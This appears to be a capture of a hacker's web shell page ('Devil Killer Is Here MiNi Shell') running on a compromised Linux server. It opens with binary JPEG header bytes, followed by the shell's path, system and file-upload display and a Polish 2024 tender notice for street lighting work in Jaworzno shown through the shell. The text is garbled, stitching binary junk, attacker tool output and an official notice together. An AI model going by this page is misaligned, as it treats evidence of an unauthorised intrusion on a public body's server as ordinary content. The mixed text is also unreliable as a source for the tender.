JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240614/0036763301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa oświetlenia ulicznego pasów drogowych i terenów gminnych na terenie miasta Jaworzna” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Zarząd Dróg i Mostów</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Sekcja Administracyjna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 240268900</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krakowska 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jaworzno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mzdim.jaworzno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzdim.jaworzno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie infrastrukturą drogową </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa oświetlenia ulicznego pasów drogowych i terenów gminnych na terenie miasta Jaworzna” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7fbe2dae-2a1e-11ef-b373-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00367633</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00046304/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Wykonanie oświetlenia w ramach projektu Jaworznickiego Budżetu Obywatelskiego na 2024 rok</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7fbe2dae-2a1e-11ef-b373-0e435a8a43bc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7fbe2dae-2a1e-11ef-b373-0e435a8a43bc</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Przedmiotowe postępowanie jest prowadzone przy użyciu środków komunikacji elektronicznej: za pośrednictwem Platformy e-Zamówienia<br/> (https://ezamowienia.gov.pl/pl/) oraz w uzasadnionych przypadkach przy użyciu poczty lektronicznej:zamowienia.publiczne@mzdim.jaworzno.pl<br/> 2. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/> drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/> komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/> zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/> wiadomości (przycisk „dodaj załącznik”). 3. W przypadku załączników, które są zgodnie z ustawą Pzp lub<br/> rozporządzeniem ws. komunikacji elektronicznej (Dz. U z 2020r. Poz. 2452) opatrzone kwalifikowanym podpisem elektronicznym,<br/> podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie<br/> ubiegającego się o udzielenie<br/> zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i<br/> jego typu (zew. wew.) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub<br/> dokument z wszytym podpisem (typ wewnętrzny).4. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym<br/> zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do<br/> korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia<br/> wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.5. Wszystkie wysłane i odebrane w<br/> postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. 6.<br/> Składanie ofert następuje za pośrednictwem modułu składania ofert i wniosków (MOW) Platformy eZamówienia .7. Zamawiający<br/> dopuszcza komunikację za pośrednictwem e-mail (zamowienia.publiczne@mzdim.jaworzno.pl ) za wyjątkiem składania i wycofania<br/> oferty lub wniosku o dopuszczenie do udziału w postępowaniu, jeśli wystąpią okoliczności niezależne od Wykonawcy<br/> uniemożliwiające komunikację przez platformę eZamowienia. Każdorazowo przy przesyłaniu przez email Wykonawca musi<br/> uzasadnić zaistnienie takiej okoliczności i odpowiednio ją udokumentować. 8 .Wykonawca zamierzający wziąć udział w<br/> postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie eZamówienia.<br/> Wykonawca posiadający konto na Platformie ma dostęp do formularzy: złożenia, wycofania oferty lub wniosku oraz do formularza do<br/> komunikacji. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e<br/>Zamówienia określa Regulamin dostępny na https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce<br/> „Centrum Pomocy”.10. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych<br/> kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji interaktywnej „oferty,<br/> wnioski i prace konkursowe” stanowiącą zał. do SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/> 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/> swobodnego przepływu takich danych oraz uchylenia dyrektyw 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/> L119 z 04.05.2016, str. 1), dalej &#34;RODO&#34;, informuję, że: 1) administratorem Pani/Pana danych osobowych jest Miejski Zarząd Dróg i<br/> Mostów w Jaworznie z siedzibą przy ul. Krakowskiej 9. 2) inspektorem ochrony danych osobowych jest Pan Miłosz Czopik, mail:<br/> iodo@mzdim.jaworzno.pl, tel. 32 614 23 003) Pani/Pana dane osobowe będą przetwarzania na podstawie art. 6 ust. 1 lit. c RODO w<br/> celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego4) odbiorcą Pani/Pana danych osobowych<br/> będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy<br/> Pzp5) Pani/Pana dane osobowe przechowywane będą przez okres niezbędny do realizacji wskazanego w pkt. 3 celu, a po tym<br/> czasie przez okres wskazany w przepisach o archiwizacji lub innych przepisach prawa6)obowiązek podania przez Panią/Pana<br/> danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp,<br/> związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego 7) w odniesieniu do Pani/Pana danych osobowych<br/> decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO 8) posiada Pani/Pan: - na podstawie art. 15 prawo dostępu<br/> do danych osobowych Pani/Pana dotyczących,- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana<br/> danychosobowych1,- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych<br/> z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO 2,- prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/> Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO 9)<br/> nie przysługuje Pani/Panu:- w związku z art. 17 ust 3 lit b,d lub e RODO prawo do usunięcia danych osobowych:- prawo do<br/> przenoszenia danych osobowych, o których mowa w art. 20 RODO,- na podstawie art. 21 RODO prawo sprzeciwu wobec<br/> przetwarzanych danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MZDIM.SA.222.20.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje budowę oświetlenia ulicznego pasów drogowych i terenów gminnych na terenie miasta Jaworzna” dla następujących 5 lokalizacji (zadania w ramach JBO 2024):<br/> 1) oświetlenie drogowe ul. Sielec <br/> 2) oświetlenie drogowe ul. Dąb boczna (przy nr 79)<br/> 3) oświetlenie mini boiska Jeleń Dąb <br/> 4) oświetlenie ciągu pieszego ul. Wilcza <br/> 5) oświetlenie drogowe ul. Marusarzówny<br/> 2. Szczegółowy zakres robót zawarty jest przedmiarach robót, a także określony jest ustaleniami zawartymi w części opisowej Specyfikacji Warunków Zamówienia. Materiały wynikające z technologii robót dostarczy Wykonawca. Zastosowane do realizacji przedmiotu zamówienia materiały i wyroby muszą posiadać aktualne świadectwa i aprobaty techniczne dopuszczenia do stosowania w budownictwie drogowym. Podstawowe określenia dotyczące zespołu zabiegów technicznych oraz merytoryczny zakres robót wskazany w przedmiarach robót zostały określone zgodnie z obowiązującymi, odpowiednimi Polskimi Normami oraz z definicjami podanymi w ogólnych specyfikacjach technicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">130 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/> przewiduje możliwość wystąpienia zamówień uzupełniających, o których mowa w art. 214 ust.1 pkt 7 ustawy Prawo zamówień<br/> publicznych, polegających na powtórzeniu podobnych robót budowlanych zgodnych z przedmiotem zamówienia podstawowego i<br/> całkowita jego wartość została uwzględniona przy obliczaniu wartości zamówienie podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia publicznego może ubiegać się Wykonawca, który spełnia warunki udziału<br/> w postępowaniu dotyczące:<br/> 1) zdolności do występowania w obrocie gospodarczym (wpis do jednego z rejestrów zawodowych lub handlowych). <br/>Zamawiający nie ustala warunku w powyższym zakresie. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/> (np. zezwolenia, licencje, koncesje, wpis do rejestru działalności regulowanej, status członka organizacji). <br/>Zamawiający nie ustala warunku w powyższym zakresie. <br/>3) sytuacji ekonomicznej lub finansowej (np. minimalne roczne przychody, stosunek aktywów do zobowiązań, ubezpieczenie<br/> OC, posiadanie określonej zdolności kredytowej lub środków finansowych). <br/>Zamawiający nie ustala warunku w powyższym zakresie. <br/>4) zdolności technicznej lub zawodowej (w tym: wykształcenie, kwalifikacje zawodowe, doświadczenie, potencjał techniczny<br/> Wykonawcy lub osób skierowanych przez Wykonawcę do realizacji zamówienia, normy zarządzania jakością, systemy lub<br/> normy zarządzania środowiskowego). <br/>a) Zamawiający wymaga, aby Wykonawca wykazał się należytym wykonaniem w ciągu ostatnich 5 lat przed upływem<br/> terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej w<br/> zakresie budowy linii kablowych oraz oświetlenia ulicznego o wartości nie mniejszej niż 100.000,00 zł brutto wraz z<br/> załączeniem dowodów, że roboty te zostały wykonane lub są wykonywane należycie, lub przedstawi pisemne zobowiązanie<br/> innych podmiotów do udostępnienia wiedzy i doświadczenia wykonawcy na okres korzystania z nich przy wykonywaniu<br/> zamówienia. <br/>W przypadku podania wartości w walucie innej niż PLN, dla porównania wartości Zamawiający przyjmie średni kurs NBP, z<br/> dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych.<br/> b) Zamawiający wymaga, aby Wykonawca wykazał, iż dysponuje lub będzie dysponował co najmniej n/w osobami:<br/> 1) Kierownikiem Robót posiadającym uprawnienia budowlane do kierowania robotami w zakresie sieci i instalacji urządzeń<br/> elektrycznych,<br/> 2) 4 osobami posiadającymi uprawnienia SEP E+D do 1kV.<br/> c) Zamawiający wymaga, aby Wykonawca wykazał, iż dysponuje lub będzie dysponował co najmniej n/w sprawnymi<br/> narzędziami i urządzeniami takimi jak:- minimum 1 samochód specjalistyczny typu zwyżka z koszem,- minimum 1 samochód dostawczy,- minimum 1 przyczepa do przewozu słupów,- minimum 2 ubijaki spalinowe lub zagęszczarki wibracyjne,- minimum 1 minikoparka,- minimum 1 kpl urządzeń przeciskowych,<br/> lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia w/w sprzętu <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie o braku<br/> podstaw do wykluczenia oraz spełnianiu warunków udziału w postępowaniu - złożone na formularzu zgodnym ze wzorem<br/> stanowiącym Załącznik nr 4 do SWZ.<br/> 2. Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia oświadczeń i dokumentów: 1) odpisu lub informacji z<br/> Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/> ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru<br/> lub ewidencji,<br/> 2) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5) ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/> rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/> wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/> oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/> przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/> należącego do tej samej grupy kapitałowej. Wykonawca może skorzystać ze wzoru, stanowiącego Załącznik nr 11 do SWZ.<br/> Wykonawca zobowiązany jest do przekazania Zamawiającemu tego oświadczenia w postaci elektronicznej - oryginał dokumentu<br/> opatrzony kwalifikowanym podpisem elektronicznym lub opatrzony podpisem zaufanym lub podpisem osobistym</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o braku podstaw do wykluczenia oraz spełnianiu warunków udziału w postępowaniu - złożone na formularzu zgodnym<br/> ze wzorem stanowiącym Załącznik nr 4 do SWZ.<br/> 2. Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w<br/> wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia oświadczeń lub dokumentów na potwierdzenie, że:<br/> a) wykonawca spełnia warunek udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej o którym mowa w<br/> Rozdziale VI ust. 1 pkt 4a ) oraz 4 b) SWZ tj.- wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/> okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty miejsca wykonywania<br/> podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów<br/> określających czy te roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym<br/> dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były<br/> wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów<br/>inne dokumenty, potwierdzający, że wykonawca wykonał co najmniej jedną robotę budowlaną w zakresie budowy linii kablowych<br/> oraz oświetlenia ulicznego o wartości nie mniejszej niż 100.000,00 zł brutto wraz z załączeniem dowodów, że roboty te zostały<br/> wykonane lub są wykonywane należycie, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia wiedzy i<br/> doświadczenia wykonawcy na okres korzystania z nich przy wykonywaniu zamówienia. Wzór<br/> wykazu stanowi załącznik nr 7 do SWZ.- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/> świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia,<br/> niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/> podstawie do dysponowania tymi osobami. Wzór wykazu stanowi załącznik nr 8 do SWZ.- Wykaz narzędzi i urządzeń: wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu<br/> wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. Wzór wykazu stanowi załącznik nr 9 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony formularz ofertowy wg Załącznika nr 5 do SWZ<br/> 2) Kosztorys ofertowy dla całości zadania opracowany 